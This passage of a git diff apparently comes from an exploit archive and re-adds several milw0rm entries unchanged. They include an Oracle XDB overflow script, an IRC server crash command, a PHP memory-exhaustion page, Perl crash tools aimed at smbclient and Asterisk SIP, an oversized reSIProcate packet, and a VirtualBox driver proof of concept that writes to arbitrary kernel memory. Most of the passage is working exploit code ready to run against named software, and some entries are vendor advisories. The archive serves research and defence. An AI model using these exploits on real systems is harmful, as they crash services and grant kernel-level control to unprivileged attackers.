Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */ +/* Reported: 18 Dec 2007 */ +/* Date of Public Advisory: January 15, 2008 */ +/* Advisory: http://www.oracle.com/technology/deploy/ */ +/* security/critical-patch-updates/cpujan2008.html */ +/* */ +/******************************************************************/ +/* thanks to oraclefun for his pitrig_dropmetadata exploit */ +/* */ +/******************************************************************/ + + +set serveroutput on +declare + buff varchar2(32767); + begin + /* generate evil buffer */ + buff:='12345678901234567890123456789'; + buff:=buff||buff; + buff:=buff||buff; + buff:=buff||buff; + buff:=buff||buff; + buff:=buff||buff; + 
buff:=buff||'0012345678901234567890123sh2kerr'; + /* lets see the buffer size */ + dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff)); + xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff); + end; + / + + +/* P.S. xDb.XDB_PITRIG_PKG.PITRIG_DROP is also vulnerable */ + + +/******************************************************************/ +/*************************** SEE U LATER ;) ***********************/ +/******************************************************************/ + +// milw0rm.com [2008-01-28] diff --git a/platforms/multiple/dos/5268.html b/platforms/multiple/dos/5268.html index f5d5954bf..206b48ee3 100755 --- a/platforms/multiple/dos/5268.html +++ b/platforms/multiple/dos/5268.html @@ -1,39 +1,39 @@ - - - - Copyright Georgi Guninski -
- Cannot be used in vulnerability databases -
- Especially securityfocus/mitre/cve/cert - - - -# milw0rm.com [2008-03-17] + + + + Copyright Georgi Guninski +
+ Cannot be used in vulnerability databases +
+ Especially securityfocus/mitre/cve/cert + + + +# milw0rm.com [2008-03-17] diff --git a/platforms/multiple/dos/5306.txt b/platforms/multiple/dos/5306.txt index 145b90ff8..270436103 100755 --- a/platforms/multiple/dos/5306.txt +++ b/platforms/multiple/dos/5306.txt 
@@ -1,39 +1,39 @@
-Affected software
------------------
-
-ircu (upto and including 2.10.12.12)
-snircd (upto and including 1.3.4)
-and many other ircu derivatives
-
-Vulnerability details
----------------------
-
-send_user_mode in s_user.c does not check that the argument after a +r mode
-is present, if it is not than the NULL sentinel may be missed, causing the
-function to iterate over the boundary of the array.
-
-One possible exploit:
-/mode nickname i i i i i i i i i i i i i i i r r r r s
-
-This won't work if there's another NULL directly after the first from the
-previous parsed command, if this is the case one can just append more modes
-or send some other junk to the ircd.
-
-Resolution
-----------
-
-Upgrade to the very latest version of ircu/snircd.
-
-Disclosure timeline
--------------------
-
-2008-03-15: Vulnerability discovered by QuakeNet and reported to Undernet.
-2008-03-15: Patches released.
-2008-03-17: Patches applied to public servers.
-2008-03-24: Public disclosure.
-
---
-Chris Porter (slug on QuakeNet)
-http://www.warp13.co.uk
-
-# milw0rm.com [2008-03-24]
+Affected software
+-----------------
+
+ircu (upto and including 2.10.12.12)
+snircd (upto and including 1.3.4)
+and many other ircu derivatives
+
+Vulnerability details
+---------------------
+
+send_user_mode in s_user.c does not check that the argument after a +r mode
+is present, if it is not than the NULL sentinel may be missed, causing the
+function to iterate over the boundary of the array.
+
+One possible exploit:
+/mode nickname i i i i i i i i i i i i i i i r r r r s
+
+This won't work if there's another NULL directly after the first from the
+previous parsed command, if this is the case one can just append more modes
+or send some other junk to the ircd.
+
+Resolution
+----------
+
+Upgrade to the very latest version of ircu/snircd.
+
+Disclosure timeline
+-------------------
+
+2008-03-15: Vulnerability discovered by QuakeNet and reported to Undernet.
+2008-03-15: Patches released. +2008-03-17: Patches applied to public servers. +2008-03-24: Public disclosure. + +-- +Chris Porter (slug on QuakeNet) +http://www.warp13.co.uk + +# milw0rm.com [2008-03-24] diff --git a/platforms/multiple/dos/5679.php b/platforms/multiple/dos/5679.php index aa2c0b5d5..c870259ff 100755 --- a/platforms/multiple/dos/5679.php +++ b/platforms/multiple/dos/5679.php @@ -1,79 +1,79 @@ -There is some kind of issue in PHP -we can run out memory even on SAFE_MODE -script simply allocate maximum of memory -and go to sleep for, let's say 9999999 seconds. -sleep() pass 'max_execution_time' setting. - - - - - Ram eater sploit
-
-
-
- -
- - -# milw0rm.com [2008-05-27] +There is some kind of issue in PHP +we can run out memory even on SAFE_MODE +script simply allocate maximum of memory +and go to sleep for, let's say 9999999 seconds. +sleep() pass 'max_execution_time' setting. + + + + + Ram eater sploit
+
+
+
+ +
+ + +# milw0rm.com [2008-05-27] diff --git a/platforms/multiple/dos/5712.pl b/platforms/multiple/dos/5712.pl index 0322d44d9..b1d918524 100755 --- a/platforms/multiple/dos/5712.pl +++ b/platforms/multiple/dos/5712.pl @@ -1,23 +1,23 @@ -#!/usr/bin/perl -# 06/01/2008 - k`sOSe -# -# ~ # smbclient //localhost/w00t -# *** glibc detected *** smbclient: free(): invalid next size (fast): 0x0823c2d8 *** -# - -use warnings; -use strict; -use IO::Socket; - - -my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '445', Listen => 1, Reuse => 1) || die($!); - -while(my $csock = $sock->accept()) -{ - print $csock "\x00" . - "\x01\xff\xff" . - "\x41" x 131071; - -} - -# milw0rm.com [2008-06-01] +#!/usr/bin/perl +# 06/01/2008 - k`sOSe +# +# ~ # smbclient //localhost/w00t +# *** glibc detected *** smbclient: free(): invalid next size (fast): 0x0823c2d8 *** +# + +use warnings; +use strict; +use IO::Socket; + + +my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '445', Listen => 1, Reuse => 1) || die($!); + +while(my $csock = $sock->accept()) +{ + print $csock "\x00" . + "\x01\xff\xff" . + "\x41" x 131071; + +} + +# milw0rm.com [2008-06-01] diff --git a/platforms/multiple/dos/5749.pl b/platforms/multiple/dos/5749.pl index 305b0724f..672ce4906 100755 --- a/platforms/multiple/dos/5749.pl +++ b/platforms/multiple/dos/5749.pl 
@@ -1,45 +1,45 @@ -#!/usr/bin/perl -w -############### - - -# asterisk AST-2008-008 -# by armando.j.m.o@gmail.com -#AST-2008-008 - Remote Crash Vulnerability in SIP channel driver when run in pedantic mode - -use Getopt::Std; -use IO::Socket; -use strict; - -my %args; -getopts("h:p:", \%args); - -if (!$args{h} || !$args{p}) { usage(); } - - -my $sock = IO::Socket::INET->new( - Proto => 'udp', - PeerPort => $args{p}, - PeerAddr => $args{h}, -) or die "Could not create socket: $!\n"; - -$sock->send('INVITE sip:1234@'.$args{h}.' SIP/2.0\n -CSeq: 2 INVITE') or die "Send error: $!\n"; - - - - -sub usage { - print STDERR -qq{ $0 - -Usage: $0 -h -p - -h = host - -p = port - -Example: - $0 -h target -p port - - -}; - -# milw0rm.com [2008-06-05] +#!/usr/bin/perl -w +############### + + +# asterisk AST-2008-008 +# by armando.j.m.o@gmail.com +#AST-2008-008 - Remote Crash Vulnerability in SIP channel driver when run in pedantic mode + +use Getopt::Std; +use IO::Socket; +use strict; + +my %args; +getopts("h:p:", \%args); + +if (!$args{h} || !$args{p}) { usage(); } + + +my $sock = IO::Socket::INET->new( + Proto => 'udp', + PeerPort => $args{p}, + PeerAddr => $args{h}, +) or die "Could not create socket: $!\n"; + +$sock->send('INVITE sip:1234@'.$args{h}.' SIP/2.0\n +CSeq: 2 INVITE') or die "Send error: $!\n"; + + + + +sub usage { + print STDERR +qq{ $0 + +Usage: $0 -h -p + -h = host + -p = port + +Example: + $0 -h target -p port + + +}; + +# milw0rm.com [2008-06-05] diff --git a/platforms/multiple/dos/6046.txt b/platforms/multiple/dos/6046.txt index 6210627c1..0c7f6f915 100755 --- a/platforms/multiple/dos/6046.txt +++ b/platforms/multiple/dos/6046.txt 
@@ -1,91 +1,91 @@
------BEGIN PGP SIGNED MESSAGE-----
-Hash: SHA1
-
-Remote DoS in reSIProcate [MU-200807-01]
-July 10, 2008
-
-http://labs.mudynamics.com/advisories.html
-
-
-Affected Products/Versions:
-
-* repro SIP proxy/registrar 1.3.2
-http://www.resiprocate.org/ReSIProcate_1.3.2_Release
-
-* Any product using the reSIProcate SIP stack 1.3.2 may also be vulnerable.
-
-
-Product Overview:
-
-http://www.resiprocate.org/
-
-reSIProcate is a SIP stack. SIP is a protocol used for voice-over-IP
-telephony. repro is a SIP proxy/registrar that uses the reSIProcate SIP stack.
-
-
-Vulnerability Details:
-
-A malformed INVITE or OPTIONS message to the repro SIP proxy/registrar can
-crash the process. The crash is caused by an assertion failure that occurs
-when the domain name in the request line URI is too long
-(rutil/dns/DnsStub.cxx, line 493). For example, the URI may be
-"sip:bob@example.comAAAAAAA...", where "sip:bob@example.com" is followed by
-256 As. To cause the crash, the address in the To header must be a valid
-target address.
-
-Example invalid packet:
- OPTIONS sip:bob@example.comAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA SIP/2.0
- Via: SIP/2.0/UDP 127.0.0.1:54422;branch=z9hG4bKZqPsHMEiem;rport
- To: "Bob"
- From: "Alice" ;tag=W4eHvLYEQX
- Call-ID: nO1DpTVfo4@mudynamics.com
- CSeq: 1 OPTIONS
- Contact:
- Max-Forwards: 70
- Content-Length: 0
-
-
-Vendor Response / Solution:
-
-Update to 1.3.3, available from
- https://www.resiprocate.org/files/pub/reSIProcate/releases/
-
-This bug was also fixed by the reSIProcate development team in SVN on
-April 23 (revision 7628).
-
-
-History:
-
-July 1, 2008 - First contact with vendor
-July 1, 2008 - Vendor acknowledges vulnerability
-July 3, 2008 - Vendor releases 1.3.3
-July 10, 2008 - Advisory released
-
-
-Mu-4000 vector:
-
-*.request-line.line.dsv.uri.body.string.append-overflow
-
-
-Credit:
-
-This vulnerability was discovered by the Mu Dynamics research team.
-
-http://labs.mudynamics.com/pgpkey.txt
-
-Mu Dynamics offers a new class of security analysis system, delivering a
-rigorous and streamlined methodology for verifying the robustness and security
-readiness of any IP-based product or application. Founded by the pioneers of
-intrusion detection and prevention technology, Mu Dynamics is backed by
-preeminent venture capital firms that include Accel Partners, Benchmark
-Capital and DAG Ventures. The company is headquartered in Sunnyvale, CA. For
-more information, visit the company's website at http://www.mudynamics.com.
------BEGIN PGP SIGNATURE-----
-Version: GnuPG v1.4.7 (Darwin)
-
-iD8DBQFIdqOZQLdDlEyOXHQRAvt+AJsHGgqEVoiQi0Nb7ND9CR7HteZJpgCeMgKv
-5lqpYSLdj7WBeXoD4l95+WA=
-=KUQC
------END PGP SIGNATURE-----
-
-# milw0rm.com [2008-07-12]
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA1
+
+Remote DoS in reSIProcate [MU-200807-01]
+July 10, 2008
+
+http://labs.mudynamics.com/advisories.html
+
+
+Affected Products/Versions:
+
+* repro SIP proxy/registrar 1.3.2
+http://www.resiprocate.org/ReSIProcate_1.3.2_Release
+
+* Any product using the reSIProcate SIP stack 1.3.2 may also be vulnerable.
+
+
+Product Overview:
+
+http://www.resiprocate.org/
+
+reSIProcate is a SIP stack. SIP is a protocol used for voice-over-IP
+telephony. repro is a SIP proxy/registrar that uses the reSIProcate SIP stack.
+
+
+Vulnerability Details:
+
+A malformed INVITE or OPTIONS message to the repro SIP proxy/registrar can
+crash the process. The crash is caused by an assertion failure that occurs
+when the domain name in the request line URI is too long
+(rutil/dns/DnsStub.cxx, line 493). For example, the URI may be
+"sip:bob@example.comAAAAAAA...", where "sip:bob@example.com" is followed by
+256 As. To cause the crash, the address in the To header must be a valid
+target address.
+
+Example invalid packet:
+ OPTIONS sip:bob@example.comAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA SIP/2.0
+ Via: SIP/2.0/UDP 127.0.0.1:54422;branch=z9hG4bKZqPsHMEiem;rport
+ To: "Bob"
+ From: "Alice" ;tag=W4eHvLYEQX
+ Call-ID: nO1DpTVfo4@mudynamics.com
+ CSeq: 1 OPTIONS
+ Contact:
+ Max-Forwards: 70
+ Content-Length: 0
+
+
+Vendor Response / Solution:
+
+Update to 1.3.3, available from
+ https://www.resiprocate.org/files/pub/reSIProcate/releases/
+
+This bug was also fixed by the reSIProcate development team in SVN on
+April 23 (revision 7628).
+
+
+History:
+
+July 1, 2008 - First contact with vendor
+July 1, 2008 - Vendor acknowledges vulnerability
+July 3, 2008 - Vendor releases 1.3.3
+July 10, 2008 - Advisory released
+
+
+Mu-4000 vector:
+
+*.request-line.line.dsv.uri.body.string.append-overflow
+
+
+Credit:
+
+This vulnerability was discovered by the Mu Dynamics research team.
+
+http://labs.mudynamics.com/pgpkey.txt
+
+Mu Dynamics offers a new class of security analysis system, delivering a
+rigorous and streamlined methodology for verifying the robustness and security
+readiness of any IP-based product or application. Founded by the pioneers of
+intrusion detection and prevention technology, Mu Dynamics is backed by
+preeminent venture capital firms that include Accel Partners, Benchmark
+Capital and DAG Ventures. The company is headquartered in Sunnyvale, CA. For
+more information, visit the company's website at http://www.mudynamics.com.
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v1.4.7 (Darwin)
+
+iD8DBQFIdqOZQLdDlEyOXHQRAvt+AJsHGgqEVoiQi0Nb7ND9CR7HteZJpgCeMgKv
+5lqpYSLdj7WBeXoD4l95+WA=
+=KUQC
+-----END PGP SIGNATURE-----
+
+# milw0rm.com [2008-07-12]
diff --git a/platforms/multiple/dos/6218.txt b/platforms/multiple/dos/6218.txt
index 961be1f9a..9456b989e 100755
--- a/platforms/multiple/dos/6218.txt
+++ b/platforms/multiple/dos/6218.txt
@@ -1,401 +1,401 @@ ------BEGIN PGP SIGNED MESSAGE----- -Hash: SHA1 - - Core Security Technologies - CoreLabs Advisory - http://www.coresecurity.com/corelabs/ - - - Sun xVM VirtualBox Privilege Escalation Vulnerability - - -*Advisory Information* - -Title: Sun xVM VirtualBox Privilege Escalation Vulnerability -Advisory ID: CORE-2008-0716 -Advisory URL: -http://www.coresecurity.com/content/virtualbox-privilege-escalation-vulnerability - -Date published: 2008-08-04 -Date of last update: 2008-08-04 -Vendors contacted: Sun Microsystems -Release mode: Coordinated release - - -*Vulnerability Information* - -Class: Insufficient input validation - -Remotely Exploitable: No -Locally Exploitable: Yes -Bugtraq ID: 30481 -CVE Name: CVE-2008-3431 - - -*Vulnerability Description* - -Virtualization technologies allow users to run different operating -systems simultaneously on top of the same set of underlying physical - -hardware. This provides several benefits to end users and organizations, -including efficiency gains in the use of hardware resources, reduction -of operational costs, dynamic re-allocation of computing resources and - -rapid deployment and configuration of software development and testing -environments. - -VirtualBox is an open source virtualization technology project -originally developed by Innotek, a software company based in Germany. - - -In February 2008 Sun Microsystems announced the acquisition of Innotek -[1] and VirtualBox was integrated into Sun's xVM family of -virtualization technologies. In May 2008, Sun Microsystems announced -that the number of downloads of the open source VirtualBox software - -package passed the five million mark [2]. - -When used on a Windows Host Operating System VirtualBox installs a -kernel driver ('VBoxDrv.sys') to control virtualization of guest -Operating Systems. 
- - -An input validation vulnerability was discovered within VirtualBox's -'VBoxDrv.sys' driver that could allow an attacker, with local but -un-privileged access to a host where VirtualBox is installed, to execute - -arbitrary code within the kernel of the Windows host operating system -and to gain complete control of a vulnerable computer system. - - -*Vulnerable Packages* - -. Sun xVM VirtualBox 1.6.2. - -. Sun xVM VirtualBox 1.6.0. -. This issue only occurs in the Microsoft Windows versions of xVM -VirtualBox. - - -*Non-vulnerable Packages* - -. Sun xVM VirtualBox 1.6.4 (for Microsoft Windows) - - - -*Vendor Information, Solutions and Workarounds* - -No workarounds exist for this issue. A security bulletin from the vendor -that describes this issue is available here: -http://sunsolve.sun.com/search/document.do?assetkey=1-66-240095-1. - - - -*Credits* - -This vulnerability was discovered and researched by Anibal Sacco from -the CORE IMPACT Exploit Writing Team (EWT) at Core Security Technologies. - - -*Technical Description / Proof of Concept Code* - - -When the VirtualBox package is installed on a host the 'VBoxDrv.sys' -driver is loaded on the machine. This driver allows any unprivileged -user to open the device '\\.\VBoxDrv' and issue IOCTLs with a buffering - -mode of METHOD_NEITHER without any kind of validation. This allows -untrusted user mode code to pass arbitrary kernel addresses as arguments -to the driver. - -With specially constructed input, a malicious user can use functionality - -within the driver to patch kernel addresses and execute arbitrary code -in kernel mode. When handling IOCTLs a communication method must be -pre-defined between the user-mode application and the driver module. The - -selected method will determine how the I/O Manager manipulates memory -buffers used in the communication. 
- -The 'METHOD_NEITHER' is a very dangerous method because the pointer -passed to 'DeviceIoControl' as input or output buffer will be sent - -directly to the driver, thus transferring it the responsibility of doing -the proper checks to validate the addresses sent from user mode. - -The 'VBoxDrv.sys' driver uses the 'METHOD_NEITHER' communication method - -when handling IOCTLs request and does not validate properly the buffer -sent in the Irp object allowing an attacker to write to any memory -address in the kernel-mode. - -Let's see the bug on the source. This is the function used to handle the - -IOCTL requests at 'SUPDrv-win.cpp'. - -/----------- - - NTSTATUS _stdcall VBoxDrvNtDeviceControl(PDEVICE_OBJECT pDevObj, PIRP -pIrp) - { - PSUPDRVDEVEXT pDevExt = (PSUPDRVDEVEXT)pDevObj->DeviceExtension; - - PIO_STACK_LOCATION pStack = IoGetCurrentIrpStackLocation(pIrp); - PSUPDRVSESSION pSession = -(PSUPDRVSESSION)pStack->FileObject->FsContext; - - /* - * Deal with the two high-speed IOCtl that takes it's arguments from - - * the session and iCmd, and only returns a VBox status code. - */ - ULONG ulCmd = pStack->Parameters.DeviceIoControl.IoControlCode; - if ( ulCmd == SUP_IOCTL_FAST_DO_RAW_RUN -(1) || ulCmd == SUP_IOCTL_FAST_DO_HWACC_RUN - - || ulCmd == SUP_IOCTL_FAST_DO_NOP) - { - KIRQL oldIrql; - int rc; - - /* Raise the IRQL to DISPATCH_LEVEl to prevent Windows from -rescheduling us to another CPU/core. */ - Assert(KeGetCurrentIrql() <= DISPATCH_LEVEL); - - KeRaiseIrql(DISPATCH_LEVEL, &oldIrql); -(2) rc = supdrvIOCtlFast(ulCmd, pDevExt, pSession); - KeLowerIrql(oldIrql); - - /* Complete the I/O request. 
*/ - NTSTATUS rcNt = pIrp->IoStatus.Status = STATUS_SUCCESS; - - pIrp->IoStatus.Information = sizeof(rc); - __try - { -(3) *(int *)pIrp->UserBuffer = rc; - } - __except(EXCEPTION_EXECUTE_HANDLER) - { - rcNt = pIrp->IoStatus.Status = GetExceptionCode(); - - dprintf(("VBoxSupDrvDeviceContorl: Exception Code %#x\n", rcNt)); - } - IoCompleteRequest(pIrp, IO_NO_INCREMENT); - return rcNt; - } - - return VBoxDrvNtDeviceControlSlow(pDevExt, pSession, pIrp, pStack); - - } - -- -----------/ - -At (1), we can see the sentence checking the IOCTL code. The constants -use are defined at 'SUPDrvIOC.h' in this way: - -/----------- - -#define SUP_IOCTL_FAST_DO_RAW_RUN SUP_CTL_CODE_FAST(64) - -/** Fast path IOCtl: VMMR0_DO_HWACC_RUN */ -#define SUP_IOCTL_FAST_DO_HWACC_RUN SUP_CTL_CODE_FAST(65) -/** Just a NOP call for profiling the latency of a fast ioctl call to -VMMR0. */ -#define SUP_IOCTL_FAST_DO_NOP SUP_CTL_CODE_FAST(66) - - -- -----------/ - -With the macro 'SUP_CTL_CODE_FAST()' defined in the same file: - -/----------- - -#define SUP_CTL_CODE_FAST(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, -(Function) - | SUP_IOCTL_FLAG, METHOD_NEITHER, - - FILE_WRITE_ACCESS) - -- -----------/ - -Now we know that the communication method used will be 'METHOD_NEITHER ' -(this could also be easily seen by looking at the resulting IOCTL code - -in the disassembled binary). - -Then at (2) the value returned by 'supdrvIOCtlFast()' is saved in 'rc' -and this is where the problem starts because at (3), the value in 'rc' -is written directly to the buffer pointer sent from usermode without any - -check to validate that it is really pointing to an usermode address or -even a valid one. 
- -In this scenario, it is possible to feed the IOCTL with kernel addresses -to write the value returned by 'supdrvIOCtlFast()' ANY address in kernel - -space memory as many times as necessary to modify kernel code or kernel -pointers to subsequently get code execution in ring 0 context (that -means, with system privileges). - -This is the Proof of Concept I have made to trigger and show the - -vulnerability. This will generate a Blue Screen of Death (BSOD) trying -to write to an unpaged kernel mode address (0x80808080) but any other -arbitrary address could be used. - -/----------- - -// Author: Anibal Sacco (aLS) - -// Contact: anibal.sacco@coresecurity.com -// anibal.sacco@gmail.com -// Organization: Core Security Technologies - - -#include -#include - -int main(int argc, char **argv) -{ - HANDLE hDevice; - DWORD cb; - char szDevice[] = "\\\\.\\VBoxDrv"; - - if ( (hDevice = CreateFileA(szDevice, - - GENERIC_READ|GENERIC_WRITE, - 0, - 0, - OPEN_EXISTING, - 0, - NULL) ) != INVALID_HANDLE_VALUE ) - - { - printf("Device %s succesfully opened!\n", szDevice); - } - else - { - printf("Error: Error opening device %s\n",szDevice); - } - - cb = 0; - if (!DeviceIoControl(hDevice, - - 0x228103, - (LPVOID)0x80808080,0, - (LPVOID)0x80808080,0x0, - &cb, - NULL)) - { - printf("Error in DeviceIo ... bytes returned %#x\n",cb); - } -} - - -- -----------/ - - -*Report Timeline* - -. 2008-07-16: Core Security Technologies notifies the VirtualBox team of -the vulnerability. -. 2008-07-17: Vendor acknowledges notification. -. 2008-07-29: Core asks the vendor for a status update in the fixing - -process. -. 2008-07-30: Vendor notifies a patched version will be publicly -available on Monday 4th, August. -. 2008-07-31: Core asks the vendor to provide URL to their alert and to -confirm which versions are vulnerable and which version will include the - -fix. -. 2008-07-31: CVE ID request sent to Mitre. -. 2008-07-31: Bugtraq ID request sent to SecurityFocus.com. -. 
2008-07-31: CVE ID received from Mitre. -. 2008-07-31: Bugtraq ID received SecurityFocus.com. -. 2008-08-01: Vendor provides draft version of Sun Alert and URL to - -reference it. -. 2008-08-01: Core updates its security advisory with information about -vulnerable and non-vulnerable packages. Core provides its URL to the -vendor and indicates that the vendor cataloged the issue as a Denial of - -Service bug but it should be considered a privilege escalation problem -since it allows unprivileged users to execute code in the kernel context. -. 2008-08-04: Vendor confirms that this issue can lead to arbitrary code - -execution by an unprivileged user. -. 2008-08-04: CORE-2008-0716 advisory is published. - - -*References* - -[1] Sun Welcomes Innotek - http://www.sun.com/software/innotek/. - -[2] http://www.sun.com/aboutsun/pr/2008-05/sunflash.20080529.1.xml. - - -*About CoreLabs* - -CoreLabs, the research center of Core Security Technologies, is charged - -with anticipating the future needs and requirements for information -security technologies. We conduct our research in several important -areas of computer security including system vulnerabilities, cyber -attack planning and simulation, source code auditing, and cryptography. - -Our results include problem formalization, identification of -vulnerabilities, novel solutions and prototypes for new technologies. -CoreLabs regularly publishes security advisories, technical papers, -project information and shared software tools for public use at: - -http://www.coresecurity.com/corelabs/. - - -*About Core Security Technologies* - -Core Security Technologies develops strategic solutions that help -security-conscious organizations worldwide develop and maintain a - -proactive process for securing their networks. The company's flagship -product, CORE IMPACT, is the most comprehensive product for performing -enterprise security assurance testing. 
CORE IMPACT evaluates network, - -endpoint and end-user vulnerabilities and identifies what resources are -exposed. It enables organizations to determine if current security -investments are detecting and preventing attacks. Core Security -Technologies augments its leading technology solution with world-class - -security consulting services, including penetration testing and software -security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core -Security Technologies can be reached at 617-399-6980 or on the Web at - -http://www.coresecurity.com. - - -*Disclaimer* - -The contents of this advisory are copyright (c) 2008 Core Security -Technologies and (c) 2008 CoreLabs, and may be distributed freely - -provided that no fee is charged for this distribution and proper credit -is given. - - -*GPG/PGP Keys* - -This advisory has been signed with the GPG key of Core Security -Technologies advisories team, which is available for download at - -http://www.coresecurity.com/files/attachments/core_security_advisories.asc. 
- ------BEGIN PGP SIGNATURE----- -Version: GnuPG v1.4.7 (MingW32) - -Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org - -iD8DBQFIl2jIyNibggitWa0RAtj0AJ9HSRe3Hq+SCqU0RfU2LwaxINL1NwCdH5p+ -md6p6ZKbhrc7SfaD6EsxjoA= -=kQyV ------END PGP SIGNATURE----- - -# milw0rm.com [2008-08-10] +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA1 + + Core Security Technologies - CoreLabs Advisory + http://www.coresecurity.com/corelabs/ + + + Sun xVM VirtualBox Privilege Escalation Vulnerability + + +*Advisory Information* + +Title: Sun xVM VirtualBox Privilege Escalation Vulnerability +Advisory ID: CORE-2008-0716 +Advisory URL: +http://www.coresecurity.com/content/virtualbox-privilege-escalation-vulnerability + +Date published: 2008-08-04 +Date of last update: 2008-08-04 +Vendors contacted: Sun Microsystems +Release mode: Coordinated release + + +*Vulnerability Information* + +Class: Insufficient input validation + +Remotely Exploitable: No +Locally Exploitable: Yes +Bugtraq ID: 30481 +CVE Name: CVE-2008-3431 + + +*Vulnerability Description* + +Virtualization technologies allow users to run different operating +systems simultaneously on top of the same set of underlying physical + +hardware. This provides several benefits to end users and organizations, +including efficiency gains in the use of hardware resources, reduction +of operational costs, dynamic re-allocation of computing resources and + +rapid deployment and configuration of software development and testing +environments. + +VirtualBox is an open source virtualization technology project +originally developed by Innotek, a software company based in Germany. + + +In February 2008 Sun Microsystems announced the acquisition of Innotek +[1] and VirtualBox was integrated into Sun's xVM family of +virtualization technologies. In May 2008, Sun Microsystems announced +that the number of downloads of the open source VirtualBox software + +package passed the five million mark [2]. 
+ +When used on a Windows Host Operating System VirtualBox installs a +kernel driver ('VBoxDrv.sys') to control virtualization of guest +Operating Systems. + + +An input validation vulnerability was discovered within VirtualBox's +'VBoxDrv.sys' driver that could allow an attacker, with local but +un-privileged access to a host where VirtualBox is installed, to execute + +arbitrary code within the kernel of the Windows host operating system +and to gain complete control of a vulnerable computer system. + + +*Vulnerable Packages* + +. Sun xVM VirtualBox 1.6.2. + +. Sun xVM VirtualBox 1.6.0. +. This issue only occurs in the Microsoft Windows versions of xVM +VirtualBox. + + +*Non-vulnerable Packages* + +. Sun xVM VirtualBox 1.6.4 (for Microsoft Windows) + + + +*Vendor Information, Solutions and Workarounds* + +No workarounds exist for this issue. A security bulletin from the vendor +that describes this issue is available here: +http://sunsolve.sun.com/search/document.do?assetkey=1-66-240095-1. + + + +*Credits* + +This vulnerability was discovered and researched by Anibal Sacco from +the CORE IMPACT Exploit Writing Team (EWT) at Core Security Technologies. + + +*Technical Description / Proof of Concept Code* + + +When the VirtualBox package is installed on a host the 'VBoxDrv.sys' +driver is loaded on the machine. This driver allows any unprivileged +user to open the device '\\.\VBoxDrv' and issue IOCTLs with a buffering + +mode of METHOD_NEITHER without any kind of validation. This allows +untrusted user mode code to pass arbitrary kernel addresses as arguments +to the driver. + +With specially constructed input, a malicious user can use functionality + +within the driver to patch kernel addresses and execute arbitrary code +in kernel mode. When handling IOCTLs a communication method must be +pre-defined between the user-mode application and the driver module. 
The + +selected method will determine how the I/O Manager manipulates memory +buffers used in the communication. + +The 'METHOD_NEITHER' is a very dangerous method because the pointer +passed to 'DeviceIoControl' as input or output buffer will be sent + +directly to the driver, thus transferring it the responsibility of doing +the proper checks to validate the addresses sent from user mode. + +The 'VBoxDrv.sys' driver uses the 'METHOD_NEITHER' communication method + +when handling IOCTLs request and does not validate properly the buffer +sent in the Irp object allowing an attacker to write to any memory +address in the kernel-mode. + +Let's see the bug on the source. This is the function used to handle the + +IOCTL requests at 'SUPDrv-win.cpp'. + +/----------- + + NTSTATUS _stdcall VBoxDrvNtDeviceControl(PDEVICE_OBJECT pDevObj, PIRP +pIrp) + { + PSUPDRVDEVEXT pDevExt = (PSUPDRVDEVEXT)pDevObj->DeviceExtension; + + PIO_STACK_LOCATION pStack = IoGetCurrentIrpStackLocation(pIrp); + PSUPDRVSESSION pSession = +(PSUPDRVSESSION)pStack->FileObject->FsContext; + + /* + * Deal with the two high-speed IOCtl that takes it's arguments from + + * the session and iCmd, and only returns a VBox status code. + */ + ULONG ulCmd = pStack->Parameters.DeviceIoControl.IoControlCode; + if ( ulCmd == SUP_IOCTL_FAST_DO_RAW_RUN +(1) || ulCmd == SUP_IOCTL_FAST_DO_HWACC_RUN + + || ulCmd == SUP_IOCTL_FAST_DO_NOP) + { + KIRQL oldIrql; + int rc; + + /* Raise the IRQL to DISPATCH_LEVEl to prevent Windows from +rescheduling us to another CPU/core. 